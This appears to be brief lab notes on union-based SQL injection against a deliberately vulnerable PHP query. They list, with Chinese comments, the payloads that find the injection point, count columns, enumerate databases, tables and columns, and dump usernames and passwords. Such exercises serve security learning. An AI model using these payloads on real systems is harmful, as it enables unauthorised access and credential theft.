1 2 3 4 5 6 7 8 9 10 11 12 13 14
| $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
#确定注入点 ?id=1' #字段 ?id=-1' union select 1,2,3 #爆数据库 ?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata--+ #爆tables ?id=-1' union select 1,database(),group_concat(table_name) from information_schema.columns where table_schema='security' #爆columns ?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+ #id,username,password ?id=-1' union select 1,group_concat(username),group_concat(password) from security.users
|